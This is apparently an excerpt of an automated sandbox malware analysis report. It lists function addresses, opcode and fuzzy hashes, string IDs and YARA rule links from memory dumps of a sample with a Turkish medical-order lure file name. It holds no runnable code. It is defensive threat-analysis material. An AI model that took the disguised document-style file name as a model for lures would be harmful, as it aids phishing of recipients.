                                                                                                                          • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                                          • API String ID: 0-2017700313
                                                                                                                          • Opcode ID: 506eca2b4fc6a80935d336024e3977e3a4fc42d9c5db7621dd4708416e10b78d
                                                                                                                          • Instruction ID: 3992f12653e2331537cf63047ffdde6902ad30b4e7328d2ba83edf35f1a057ec
                                                                                                                          • Opcode Fuzzy Hash: 506eca2b4fc6a80935d336024e3977e3a4fc42d9c5db7621dd4708416e10b78d
                                                                                                                          • Instruction Fuzzy Hash: DB71F234B043449FD700EB64D455BAEBBB2BF89300F1485E9D8869F386CB74AE46C792
                                                                                                                          Function 076577C8 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: %*&/)(#$^@!~-_$0,Aq
                                                                                                                          • API String ID: 0-2017700313
                                                                                                                          • Opcode ID: 6cee7c9ccc704291f1c86909fe0a6a01335d5214a00a520590a69dd4d0a06b1f
                                                                                                                          • Instruction ID: 5e214baba03de20b1ed5ab110fd0e5e09993bc9e967097a30ce9cc900375aed1
                                                                                                                          • Opcode Fuzzy Hash: 6cee7c9ccc704291f1c86909fe0a6a01335d5214a00a520590a69dd4d0a06b1f
                                                                                                                          • Instruction Fuzzy Hash: 28619234B002059FD704AB64D455BAEB7B2FF88300F1485A9D9869F38ACF71AE46CBD1
                                                                                                                          Function 07659250 Relevance: 2.6, Strings: 2, Instructions: 59COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 8q$8q
                                                                                                                          • API String ID: 0-4291441500
                                                                                                                          • Opcode ID: 8bfbbd4c8723e172aca24dbde07295426152d314c41a4e872f439346a62defa1
                                                                                                                          • Instruction ID: 221f5c064fd898d9ae24afd6b06b8069c1220f7084e109631025f90059d46783
                                                                                                                          • Opcode Fuzzy Hash: 8bfbbd4c8723e172aca24dbde07295426152d314c41a4e872f439346a62defa1
                                                                                                                          • Instruction Fuzzy Hash: 4C1108F4A3C341EFC7045764C44867E7AA5EB8B340F41441BDE43EB2C1DA652943ABA3
                                                                                                                          Function 076582D0 Relevance: 2.5, Strings: 2, Instructions: 45COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $q$$q
                                                                                                                          • API String ID: 0-3126353813
                                                                                                                          • Opcode ID: baabb1bb91ec2bd3d0c9fb518dd6a89a32c1cb50121caccfa2947eb67c89d59b
                                                                                                                          • Instruction ID: cc6f61bc22d7ab594d1ea9370041fd10d321a163540bdb7c33f7cf6bd94ecf8d
                                                                                                                          • Opcode Fuzzy Hash: baabb1bb91ec2bd3d0c9fb518dd6a89a32c1cb50121caccfa2947eb67c89d59b
                                                                                                                          • Instruction Fuzzy Hash: 0B019EB0629343CFD315D664C815362BFA1BB02244F1882EBD84BCBA42CB348842D7AB
                                                                                                                          Function 06220040 Relevance: 2.0, Strings: 1, Instructions: 754COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 0-2718639967
                                                                                                                          • Opcode ID: 476680c3f83cea81c2252ee5ebae720e0a4c3182db8aef9e6a03f850973d314b
                                                                                                                          • Instruction ID: 2d851c59acc0ad61049bca4ce8bac0a46fd9ef59ab0b1e79baacc7e3ed64b39d
                                                                                                                          • Opcode Fuzzy Hash: 476680c3f83cea81c2252ee5ebae720e0a4c3182db8aef9e6a03f850973d314b
                                                                                                                          • Instruction Fuzzy Hash: 84622170D10B539AD7B09FB4C5983AEBAA1AB45345F604E1ED4BADE390CF3494C2CB49
                                                                                                                          Function 07652D98 Relevance: 1.5, Strings: 1, Instructions: 217COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (q
                                                                                                                          • API String ID: 0-2414175341
                                                                                                                          • Opcode ID: 87cc6b0750596096a04309d389b574c251ea13f648eee1a031cea9ac8484005e
                                                                                                                          • Instruction ID: 628ec3de79fcc960a790fb12e35af74d23c925aa65b5a05bbcdd2b1f34563a30
                                                                                                                          • Opcode Fuzzy Hash: 87cc6b0750596096a04309d389b574c251ea13f648eee1a031cea9ac8484005e
                                                                                                                          • Instruction Fuzzy Hash: 1871A1B0A003069FEB25DB75D854BAEBBE6FF84250F14842AE9079B390CF749D42DB51
                                                                                                                          Function 06223468 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (oq
                                                                                                                          • API String ID: 0-1999159160
                                                                                                                          • Opcode ID: 98a4bec383478ee3199c38669687adf469c917cd7dea0a89abcf0313846f7dc0
                                                                                                                          • Instruction ID: e827f0e61bc7cd4eedfda0f7f90aee860a5dc174d9a432cc4b9f1397a42c72bd
                                                                                                                          • Opcode Fuzzy Hash: 98a4bec383478ee3199c38669687adf469c917cd7dea0a89abcf0313846f7dc0
                                                                                                                          • Instruction Fuzzy Hash: 4F51F631F20227AFCBA4DF68C88467E7BB6AF85200B054469DD15DB361E739D841CB95
                                                                                                                          Function 06223040 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: d8q
                                                                                                                          • API String ID: 0-2239850164
                                                                                                                          • Opcode ID: eada57a03a24f167ae008916c04f5b417421bb4c1030a751751f7babe0200a42
                                                                                                                          • Instruction ID: af249f2c51dcf4308c072d9ea00f9ac39c5046442e764bcb387ad9b609359d26
                                                                                                                          • Opcode Fuzzy Hash: eada57a03a24f167ae008916c04f5b417421bb4c1030a751751f7babe0200a42
                                                                                                                          • Instruction Fuzzy Hash: 46616C35F2022AAFDB55DF64D844AEE7BB2AF88711F144069E902AB350DB75DC41CBA0
                                                                                                                          Function 0765A2E0 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 0-2718639967
                                                                                                                          • Opcode ID: aa6f4ab65159d56427cede8b217ea680b0e23082d0148ab2b17917fcb4a20737
                                                                                                                          • Instruction ID: ee36caaf960ff1ff4014e9cf81eed7efbaf14dc43daa8a7f3945f977c053dc77
                                                                                                                          • Opcode Fuzzy Hash: aa6f4ab65159d56427cede8b217ea680b0e23082d0148ab2b17917fcb4a20737
                                                                                                                          • Instruction Fuzzy Hash: C53135B29002099FDF14DFA9D844ADEBFF5EF48314F10852AE909E7310D735A954CBA4
                                                                                                                          Function 062229B8 Relevance: 1.3, Strings: 1, Instructions: 82COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hq
                                                                                                                          • API String ID: 0-1594803414
                                                                                                                          • Opcode ID: 785a55fe31a3f8e38423276e48aadb251e86c7820c7e5515982ccde29598cd14
                                                                                                                          • Instruction ID: de724d11481cb0ad0019fe4979cbc3aa4994a87c176e703ae127ba3acb7ae902
                                                                                                                          • Opcode Fuzzy Hash: 785a55fe31a3f8e38423276e48aadb251e86c7820c7e5515982ccde29598cd14
                                                                                                                          • Instruction Fuzzy Hash: 59210230A19345EFE7559BB49C05BAE7BB6EF89300F14C0AAEA01DB281DA754E01C7A1
                                                                                                                          Function 062229C8 Relevance: 1.3, Strings: 1, Instructions: 73COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Hq
                                                                                                                          • API String ID: 0-1594803414
                                                                                                                          • Opcode ID: fa0d43a303c681784700d844ef1d173730aa08aea94c5c1b3c2a1968ae9c6ad5
                                                                                                                          • Instruction ID: 70b79783587d6468b69d8084d066b70e1be47e9ee3ef2a5098755df937e09532
                                                                                                                          • Opcode Fuzzy Hash: fa0d43a303c681784700d844ef1d173730aa08aea94c5c1b3c2a1968ae9c6ad5
                                                                                                                          • Instruction Fuzzy Hash: D821F330A14305FFEB449BB49C16BEE7BB6EBC5700F50C066EA05DB280DA755E0187A1
                                                                                                                          Function 07658E68 Relevance: 1.3, Strings: 1, Instructions: 68COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $q
                                                                                                                          • API String ID: 0-1301096350
                                                                                                                          • Opcode ID: 0fe34fd195795edf6fcd4f57636898753ebd8444f1b223738bd07089989cfdfc
                                                                                                                          • Instruction ID: 32101f512c3d374a40565cadee8865f8961025fa1bf4be5b56ff85b1f4f20de8
                                                                                                                          • Opcode Fuzzy Hash: 0fe34fd195795edf6fcd4f57636898753ebd8444f1b223738bd07089989cfdfc
                                                                                                                          • Instruction Fuzzy Hash: DC11B1B092C383DFC3219664A8116A67FF59B47114F1884EBDC47CB983C63A8843A7A7
                                                                                                                          Function 076559F4 Relevance: 1.3, Strings: 1, Instructions: 56COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: mfCo
                                                                                                                          • API String ID: 0-2718639967
                                                                                                                          • Opcode ID: 5736dbce468f033f7a0c068ebd140f83b5e18bab4640be38cc430d90304e17de
                                                                                                                          • Instruction ID: d1a150e41981dd19a5b32673e948eba6e3f18667f2b9408eb5517c06adf2e76c
                                                                                                                          • Opcode Fuzzy Hash: 5736dbce468f033f7a0c068ebd140f83b5e18bab4640be38cc430d90304e17de
                                                                                                                          • Instruction Fuzzy Hash: D821E0B68003599FCB20CF9AD884ADEBFF4EB48314F10851AE919A7310C375A944CFA5
                                                                                                                          Function 076582C1 Relevance: 1.3, Strings: 1, Instructions: 39COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $q
                                                                                                                          • API String ID: 0-1301096350
                                                                                                                          • Opcode ID: ddc651c27183f01d0554598322ff10d869075c3627c20a8c0cf4805e2ff62298
                                                                                                                          • Instruction ID: 281dec5349b34f4445d47d6ba81ea425c94d6e186bf25ea8034742b724373792
                                                                                                                          • Opcode Fuzzy Hash: ddc651c27183f01d0554598322ff10d869075c3627c20a8c0cf4805e2ff62298
                                                                                                                          • Instruction Fuzzy Hash: BDF044F0529643DFD3548664D9117B2BFA5B702244F4482A7DD0BCBE41CB748C42E7EA
                                                                                                                          Function 0765B88A Relevance: 1.3, Strings: 1, Instructions: 38COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: E
                                                                                                                          • API String ID: 0-3568589458
                                                                                                                          • Opcode ID: 16e665b8e66b13b8d28cbf99d3fc9a89baa0ae32e6003034368ebd29d49440e1
                                                                                                                          • Instruction ID: adb49e10010e16aeda4e3c6aaf0eedbc926b2f9ae759dbb59c8b47f950f19253
                                                                                                                          • Opcode Fuzzy Hash: 16e665b8e66b13b8d28cbf99d3fc9a89baa0ae32e6003034368ebd29d49440e1
                                                                                                                          • Instruction Fuzzy Hash: D0F05EE193D20CDFD710DA95A8121BE77A89B43221F14159BDC4F87642D9210E42B7E3
                                                                                                                          Function 07656D20 Relevance: 1.3, Strings: 1, Instructions: 19COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: G
                                                                                                                          • API String ID: 0-985283518
                                                                                                                          • Opcode ID: d448e58653b53fe055f09b517fe1ca718f8aab0734d4e49187dc228f94c9c6c3
                                                                                                                          • Instruction ID: fde276420545d44cde9678a4f901ff356f24b5a08e012faa250ed536e779d3fd
                                                                                                                          • Opcode Fuzzy Hash: d448e58653b53fe055f09b517fe1ca718f8aab0734d4e49187dc228f94c9c6c3
                                                                                                                          • Instruction Fuzzy Hash: 53D05EB202D348DFC7058F50E9211B9BB78DB13221F1405C7DC4A8A142DB681E11E792
                                                                                                                          Function 07656D30 Relevance: 1.3, Strings: 1, Instructions: 11COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: G
                                                                                                                          • API String ID: 0-985283518
                                                                                                                          • Opcode ID: dd1084e45c3d90a59ea17e50955f359340b905794e390be5b657b08d98eb3fe2
                                                                                                                          • Instruction ID: 36564a7354744038e25e70f108a67ed67b610bec89af9e3fa4418bea47d2055b
                                                                                                                          • Opcode Fuzzy Hash: dd1084e45c3d90a59ea17e50955f359340b905794e390be5b657b08d98eb3fe2
                                                                                                                          • Instruction Fuzzy Hash: 04C012B0508208EBCB08CF80D90562DB7AC9702601F400684DD0E42200DBB52E20AA82
                                                                                                                          Function 0622C5F0 Relevance: .5, Instructions: 523COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 4f40c4d3003f2e08733bbeead928ed205e60bd4e275b912c547960468e96f927
                                                                                                                          • Instruction ID: 2a27edac56fc5299faea16ed0d763476d88321aabeba99c58f747ba7a9cb9a4c
                                                                                                                          • Opcode Fuzzy Hash: 4f40c4d3003f2e08733bbeead928ed205e60bd4e275b912c547960468e96f927
                                                                                                                          • Instruction Fuzzy Hash: 49420530E1061ADFDF55EFA8C8446ECBBB1BF49300F518299D5497B265EB309A98CF81
                                                                                                                          Function 0622C5E0 Relevance: .5, Instructions: 522COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d1f791781b0755c48326714f568c742cf57ccf10c2e94666f8b690898fc99eb4
                                                                                                                          • Instruction ID: 665e4e226fbbaf2496b706d93db1e3663f1eb91d8948d2bde9465b7c3bd0f189
                                                                                                                          • Opcode Fuzzy Hash: d1f791781b0755c48326714f568c742cf57ccf10c2e94666f8b690898fc99eb4
                                                                                                                          • Instruction Fuzzy Hash: BC420630E1061ADFDF55EFA8C8446ECBBB1BF49300F518299D5497B265EB309A98CF81
                                                                                                                          Function 06220006 Relevance: .5, Instructions: 484COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b5acf3e7c410507db3118cf9cf21584b4a380e23abfe0539f89d3cae78bf02b2
                                                                                                                          • Instruction ID: 5a04824d566453ffc0e4771b345bc570710196cb40f0d3b7923da4459f707e0c
                                                                                                                          • Opcode Fuzzy Hash: b5acf3e7c410507db3118cf9cf21584b4a380e23abfe0539f89d3cae78bf02b2
                                                                                                                          • Instruction Fuzzy Hash: 6B227DB0D15B539AD7B05FA4848839EBAA0AB06385F704E5BC4FACE351D73490C7CB4A
                                                                                                                          Function 07650480 Relevance: .3, Instructions: 332COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 74e477a0ab3265eaf7d83444a1ae3264a2d433ac34b2a71c8d7085fc0546112a
                                                                                                                          • Instruction ID: ebbb2a50d9062276803e0acce8b04e9b8dbef408671c94704a9ca627b5ca6667
                                                                                                                          • Opcode Fuzzy Hash: 74e477a0ab3265eaf7d83444a1ae3264a2d433ac34b2a71c8d7085fc0546112a
                                                                                                                          • Instruction Fuzzy Hash: 96F1D971D1061ACBCF10DFA4C854AEDB7B5FF58300F1096A9D85AB7254EB70AA85CF90
                                                                                                                          Function 07650471 Relevance: .3, Instructions: 307COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: eb1d07d723d0981f9adbcd81b53a2b6b38e5f12bffaa4cbb779d67a044685d9d
                                                                                                                          • Instruction ID: 33689934661081e43342faf0adbf9ec82aa61c84fcc82b9b53dff33ac4dc7393
                                                                                                                          • Opcode Fuzzy Hash: eb1d07d723d0981f9adbcd81b53a2b6b38e5f12bffaa4cbb779d67a044685d9d
                                                                                                                          • Instruction Fuzzy Hash: 69E1E871D1061ACBCF10DFA8C8546EDB7B5FF58300F1096A9E85AB7254EB70AA85CF90
                                                                                                                          Function 06227D60 Relevance: .3, Instructions: 289COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 7a932e2d9f0b34b5ab0c0e46ffc1de7054b4f7439e0c7ffa5a85c52ce9056c82
                                                                                                                          • Instruction ID: e909dbff8c045b38c671884f5a7e080bf9f536759a2f6654e858ca5493d0ca94
                                                                                                                          • Opcode Fuzzy Hash: 7a932e2d9f0b34b5ab0c0e46ffc1de7054b4f7439e0c7ffa5a85c52ce9056c82
                                                                                                                          • Instruction Fuzzy Hash: EEB17A34A20216DFDB54DF69C494AAEBBF6BF88700F1540A9E905EB3A1CB34DC42CB50
                                                                                                                          Function 0765F0B0 Relevance: .3, Instructions: 262COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a51632c23d206edbcb7a4589fee16e193c560179b2aa1aa0590f3a61dcb26e26
                                                                                                                          • Instruction ID: 2750cca29050867091ea8323c09dd4c99da954cb54362d28ae9da9d9b3ad1fca
                                                                                                                          • Opcode Fuzzy Hash: a51632c23d206edbcb7a4589fee16e193c560179b2aa1aa0590f3a61dcb26e26
                                                                                                                          • Instruction Fuzzy Hash: 29A172B4E1521ADFDB14DFA4D440AEDB7B6FF89300F108619D91AAB345DB30A846CF90
                                                                                                                          Function 0622BDB0 Relevance: .2, Instructions: 233COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_6220000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: f3735ff375d319bc50a6203de00193a4995f00a3cae9c639617dadf29674a112
                                                                                                                          • Instruction ID: 1cfc4882fc3a1b84d0c5b73d5af37a333268e0aff6bd09f6f3ec7b9841aacfb4
                                                                                                                          • Opcode Fuzzy Hash: f3735ff375d319bc50a6203de00193a4995f00a3cae9c639617dadf29674a112
                                                                                                                          • Instruction Fuzzy Hash: 6791C330E2061BEFCB51EF64D4886ADBBB0FF45305F5080A9E855AB2A5EB709955CF80
                                                                                                                          Function 07654AB0 Relevance: .2, Instructions: 224COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1346023974.0000000007650000.00000040.00000800.00020000.00000000.sdmp, Offset: 07650000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_1_2_7650000_fiyati_teklif 65TIBBI20_ DRC Medikal Cihaz Sipari#U015fi jpeg docx .jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: c30a82fd57221385cdd59c58c025f149eff8723c609693328ce85c529b484b16
                                                                                                                          • Instruction ID: af1fa2bb091b301065ceb544ebcdfba099509a79876d9f2a07f1c5777266d2f9
                                                                                                                          • Opcode Fuzzy Hash: c30a82fd57221385cdd59c58c025f149eff8723c609693328ce85c529b484b16
                                                                                                                          • Instruction Fuzzy Hash: 1DA1D375910619CFDB50EF68C840AD9FBB1FF49314F05C299E949BB215EB30AA89CF90
                                                                                                                          Function 06229AF8 Relevance: .2, Instructions: 211COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000001.00000002.1345581606.0000000006220000.00000040.00000800.00020000.00000000.sdmp, Offset: 06220000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
